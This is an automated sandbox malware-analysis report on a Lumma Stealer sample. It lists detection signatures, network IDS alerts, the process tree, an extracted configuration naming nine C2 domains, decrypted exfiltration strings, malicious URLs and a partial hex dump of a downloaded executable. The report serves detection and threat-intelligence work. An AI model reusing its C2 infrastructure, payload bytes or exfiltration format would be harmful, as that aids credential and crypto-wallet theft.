Edit tour

Windows Analysis Report
b0cQukXPAl.exe

Overview

General Information

Sample name:	b0cQukXPAl.exe renamed because original name is a hash value
Original sample name:	9fc816bb0cbe07f412d1dda6feedb96f.exe
Analysis ID:	1588997
MD5:	9fc816bb0cbe07f412d1dda6feedb96f
SHA1:	a1ad3308aff286e85320d7a0ba675a8c908855c5
SHA256:	aec328fd9bcc345b1e5e9f7bc80243e9a2c1df438c41b51e09b4efe76ad58d0a
Tags:	exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

b0cQukXPAl.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\b0cQukXPAl.exe" MD5: 9FC816BB0CBE07F412D1DDA6FEEDB96F)

2889.tmp.exe (PID: 7940 cmdline: "C:\Users\user\AppData\Local\Temp\2889.tmp.exe" MD5: 1B513E6F8721E444A9364DD93630F015)

WerFault.exe (PID: 1436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1852 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "robinsharez.shop", "chipdonkeruz.shop", "versersleep.shop", "crowdwarek.shop", "soundtappysk.shop", "apporholis.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3754052818.0000000000560000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1792085926.0000000000540000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1792386987.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2889.tmp.exe PID: 7940	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 2889.tmp.exe PID: 7940	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2889.tmp.exe PID: 7940	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 17 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:18.196161+0100	2028371	3	Unknown Traffic	192.168.2.10	49749	104.102.49.254	443	TCP
2025-01-11T08:11:19.357724+0100	2028371	3	Unknown Traffic	192.168.2.10	49757	104.21.96.1	443	TCP
2025-01-11T08:11:20.410096+0100	2028371	3	Unknown Traffic	192.168.2.10	49766	104.21.96.1	443	TCP
2025-01-11T08:11:22.087445+0100	2028371	3	Unknown Traffic	192.168.2.10	49777	104.21.96.1	443	TCP
2025-01-11T08:11:26.093840+0100	2028371	3	Unknown Traffic	192.168.2.10	49803	104.21.96.1	443	TCP
2025-01-11T08:11:38.849640+0100	2028371	3	Unknown Traffic	192.168.2.10	49887	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:19.878073+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49757	104.21.96.1	443	TCP
2025-01-11T08:11:20.901411+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49766	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:19.878073+0100	2049836	1	A Network Trojan was detected	192.168.2.10	49757	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:20.901411+0100	2049812	1	A Network Trojan was detected	192.168.2.10	49766	104.21.96.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.444962+0100	2059035	1	Domain Observed Used for C2 Detected	192.168.2.10	51251	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.480645+0100	2059037	1	Domain Observed Used for C2 Detected	192.168.2.10	50645	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.457276+0100	2059039	1	Domain Observed Used for C2 Detected	192.168.2.10	64729	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.425578+0100	2059041	1	Domain Observed Used for C2 Detected	192.168.2.10	49857	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.492187+0100	2059043	1	Domain Observed Used for C2 Detected	192.168.2.10	58478	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.507322+0100	2059049	1	Domain Observed Used for C2 Detected	192.168.2.10	62549	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.380444+0100	2059088	1	Domain Observed Used for C2 Detected	192.168.2.10	53522	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.406109+0100	2059051	1	Domain Observed Used for C2 Detected	192.168.2.10	51411	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:17.468799+0100	2059057	1	Domain Observed Used for C2 Detected	192.168.2.10	61176	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:25.393802+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.10	49777	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:14.318136+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49722	104.21.56.70	443	TCP
2025-01-11T08:11:15.156783+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49728	176.113.115.19	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:18.701521+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.10	49749	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: b0cQukXPAl.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://soundtappysk.shop/api	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/	Avira URL Cloud: Label: malware
Source: https://soundtappysk.shop/p	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=	Avira URL Cloud: Label: malware
Source: https://soundtappysk.shop/x	Avira URL Cloud: Label: malware
Source: https://soundtappysk.shop/	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/api	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/tps:fu	Avira URL Cloud: Label: malware
Source: https://soundtappysk.shop:443/api	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306978
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1306978

Found malware configuration

Source: 3.3.2889.tmp.exe.2110000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "robinsharez.shop", "chipdonkeruz.shop", "versersleep.shop", "crowdwarek.shop", "soundtappysk.shop", "apporholis.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: b0cQukXPAl.exe	Virustotal: Detection: 40%			Perma Link
Source: b0cQukXPAl.exe	ReversingLabs: Detection: 83%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: b0cQukXPAl.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: skidjazzyric.click
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Unpacked PE file: 0.2.b0cQukXPAl.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Unpacked PE file: 3.2.2889.tmp.exe.400000.0.unpack

Source: b0cQukXPAl.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.10:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49887 version: TLS 1.2

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004389E2 FindFirstFileExW,		0_2_004389E2
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02128C49 FindFirstFileExW,		0_2_02128C49

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.10:64729 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.10:58478 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.10:53522 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.10:49857 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.10:51251 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.10:61176 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.10:51411 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.10:50645 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.10:62549 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49749 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49777 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49766 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49766 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: skidjazzyric.click
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: femalsabler.shop
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop
Source: Malware configuration extractor	URLs: apporholis.shop

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: femalsabler.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: robinsharez.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: skidjazzyric.click replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 171.39.242.20.in-addr.arpa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: versersleep.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chipdonkeruz.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: apporholis.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: soundtappysk.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: crowdwarek.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: handscreamny.shop replaycode: Name error (3)

Source: global traffic

TCP traffic: 192.168.2.10:63324 -> 162.159.36.2:53

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 11 Jan 2025 07:11:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 11 Jan 2025 07:00:01 GMTETag: "51600-62b68c29a3e41"Accept-Ranges: bytesContent-Length: 333312Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 72 f6 05 ca 36 97 6b 99 36 97 6b 99 36 97 6b 99 8b d8 fd 99 37 97 6b 99 28 c5 ef 99 13 97 6b 99 28 c5 fe 99 28 97 6b 99 28 c5 e8 99 4c 97 6b 99 11 51 10 99 35 97 6b 99 36 97 6a 99 43 97 6b 99 28 c5 e1 99 37 97 6b 99 28 c5 ff 99 37 97 6b 99 28 c5 fa 99 37 97 6b 99 52 69 63 68 36 97 6b 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 02 9a cc 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 04 00 00 2e 01 00 00 00 00 00 b5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 0e b5 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 2b 04 00 28 00 00 00 00 d0 04 00 28 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 47 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 24 04 00 00 10 00 00 00 26 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 86 00 00 00 40 04 00 00 60 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 bb 00 00 00 d0 04 00 00 8c 00 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.56.70 104.21.56.70
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49749 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49766 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49728 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49887 -> 104.21.96.1:443
